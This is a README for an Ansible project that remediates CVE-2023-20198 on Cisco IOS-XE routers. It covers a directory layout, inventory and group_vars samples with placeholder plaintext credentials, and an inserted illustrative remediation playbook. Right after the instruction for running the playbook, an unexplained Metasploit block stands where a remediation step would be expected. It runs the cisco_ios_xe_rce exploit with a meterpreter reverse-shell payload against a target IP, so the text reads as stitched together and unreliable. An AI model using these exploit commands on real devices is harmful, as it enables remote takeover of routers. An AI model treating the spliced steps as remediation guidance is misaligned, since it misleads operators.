This repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.
It does the following:
- Checks whether the web service is enabled on the router by looking for the associated commands in the running config
- Disables the web service if running
- Saves the configuration if changed
- Checks the logs for signs of previous exploitation
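The four steps above, written out as an illustrative playbook. This is an added example, not the repository's own remediate.yml; it assumes the cisco.ios collection is installed, the iosxe_devices group from the inventory described below, and that the IOS-XE web service is controlled by the `ip http server` and `ip http secure-server` commands. The log indicator pattern is a placeholder: substitute the patterns published in the vendor advisory.

```yaml
---
# Added example playbook, not the project's remediate.yml.
# Assumes: cisco.ios collection, an inventory group "iosxe_devices",
# and connection variables set in group_vars/iosxe_devices.yml.
- name: Disable the IOS-XE web service and look for signs of prior exploitation
  hosts: iosxe_devices
  gather_facts: false

  vars:
    # Placeholder only. Replace with the indicator patterns from the vendor advisory.
    log_indicator_regex: "EXAMPLE_SUSPICIOUS_WEBUI_PATTERN"

  tasks:
    - name: Collect the HTTP server lines from the running config and the log buffer
      cisco.ios.ios_command:
        commands:
          - show running-config | include ^ip http
          - show logging
      register: collected

    - name: Decide whether the web service is enabled
      ansible.builtin.set_fact:
        web_service_enabled: "{{ collected.stdout[0] is search('^ip http (secure-)?server', multiline=True) }}"

    - name: Disable the web service; ios_config writes memory only when it changed something
      cisco.ios.ios_config:
        lines:
          - no ip http server
          - no ip http secure-server
        save_when: modified
      when: web_service_enabled | bool

    - name: Keep only the log lines that match the indicator pattern
      ansible.builtin.set_fact:
        suspicious_log_lines: "{{ collected.stdout_lines[1] | select('search', log_indicator_regex) | list }}"

    - name: Report matches so the device can be investigated rather than trusted
      ansible.builtin.debug:
        msg: "{{ inventory_hostname }}: {{ suspicious_log_lines | length }} log line(s) matched {{ log_indicator_regex }}"
      when: suspicious_log_lines | length > 0
```

Because `ios_config` only pushes lines that are not already present in the running config (a disabled HTTP server shows up as `no ip http server`), and `save_when: modified` writes memory only after a real change, a second run against an already remediated device reports no changes. The log check is read-only and leaves any matching device for a human to examine; disabling the web service removes the exposure but does not undo changes an earlier intrusion may have made.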
```text
CVE-2023-20198-Fix/
│
├── ansible.cfg            # Ansible configuration file
├── group_vars/            # Directory for variables specific to groups of hosts
│   └── iosxe_devices.yml  # Variable definitions for IOS-XE devices
├── inventory.yml          # Inventory of hosts, including devices to target
└── remediate.yml          # Playbook for remediating CVE-2023-20198
```
Ensure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.
Configure Ansible: Edit ansible.cfg to match your environment settings.
Update inventory.yml with the host details of your IOS-XE devices.
Define any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.
To add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:
```yaml
iosxe_devices:
  hosts:
    vulnerable_router01:
      ansible_host: 192.168.1.3
      # ... other necessary variables
```
Replace vulnerable_router01 with your device's hostname and the ansible_* variables with the actual values for your device.
If you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:
```yaml
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password          # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password   # Lab use only, store credentials responsibly!
# ... other variables
```
To execute the playbook, use the following command:
```shell
ansible-playbook remediate.yml -i inventory.yml
```
```
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242 # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit
```
Always test your changes in a controlled environment before running the playbook in production.
Store sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.
For additional security measures and best practices, consult Ansible's official documentation.
Please replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.